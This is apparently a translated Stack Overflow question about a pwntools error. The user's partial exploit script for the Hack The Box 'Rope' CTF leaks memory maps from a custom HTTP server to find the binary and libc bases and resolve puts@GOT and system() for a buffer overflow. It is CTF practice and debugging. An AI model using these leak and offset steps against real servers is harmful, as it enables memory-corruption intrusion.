我正在观看此视频https://youtu.be/GTQxZlr5yvE?t=2185(Ippsec的Rope CTF),他定义了checksec参数。
该漏洞利用是httpserver(自定义服务器)中的缓冲区溢出。第1步工作正常。 第一个错误在步骤2处发生在 elf = ELF(“./httpserver”,checksec = False)和 libc = ELF(“./libc.so.6.32.self”,checksec = False)from pwn import *
import requests
context(arch="i686",os="linux")
RHOST = '127.0.0.1'
RPORT = '9999'
def getFile(file):
header = {"Range" : "bytes=0-4096"}
r = requests.get(f"http://{RHOST}:{RPORT}/{file}",headers=header)
return r.text
#step 1. Find Address #THIS PART WORKS FINE
log.info("Finding Binary/Libc Location via /proc/self/maps")
maps = getFile("/proc/self/maps")
addr_bin = maps.split('\n')[0][:8] #addr of httpserver
addr_libc = maps.split('\n')[6][:8] #addr of libc.so.6
log.success(f"Binary is at : 0x{addr_bin}")
log.success(f"Binary is at : 0x{addr_libc}")
#step 2. Calculating offsets #THIS SECTION ERROR OCCURS
log.info("Finding the address of PUTS + SYSTEM()")
elf = ELF("./httpserver" , checksec=False) #<----ERROR HERE checksec
libc = ELF("./libc.so.6.32.self", checksec= False) #<----ERROR HERE checksec
elf.address = int(addr_bin, 16)
libc.address = int(addr_libc, 16)
got_puts = elf.got['puts'] #<----ERROR HERE puts
system = libc.symbols['system']
log.success(f"Puts@GOT: {got_puts}")
log.success(f"SYSTEM@LIBC: {system}")
当我运行代码时,出现此错误Traceback (most recent call last):
File "/home/evildead/Desktop/ctf/htb/rope/files/exploit.py", line 27, in <module>
elf = ELF("./httpserver" , checksec= False)
TypeError: __init__() got an unexpected keyword argument 'checksec'
我在Google上搜索了此错误,但找不到任何有关它的信息。请你帮我一下!我尝试安装“pip install pyelftools”,但收到相同的错误。注释 checksec = False 部分时,我没有出现错误,但是再次运行代码时,它给了我第二个错误Exception has occurred: KeyError
'puts'
File "/home/evildead/Desktop/ctf/htb/rope/files/exploit.py", line 30, in <module>
got_puts = elf.got['puts']
谁能告诉我如何解决这些错误?我不能练习:(
最佳答案
我相信您捕获了Python3-PwnTools,这是pwntools不支持py3时的旧版本。安装常规的“pwntools”,它应该可以工作。
关于python - TypeError : __init__() got an unexpected keyword argument 'checksec' ,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/61990373/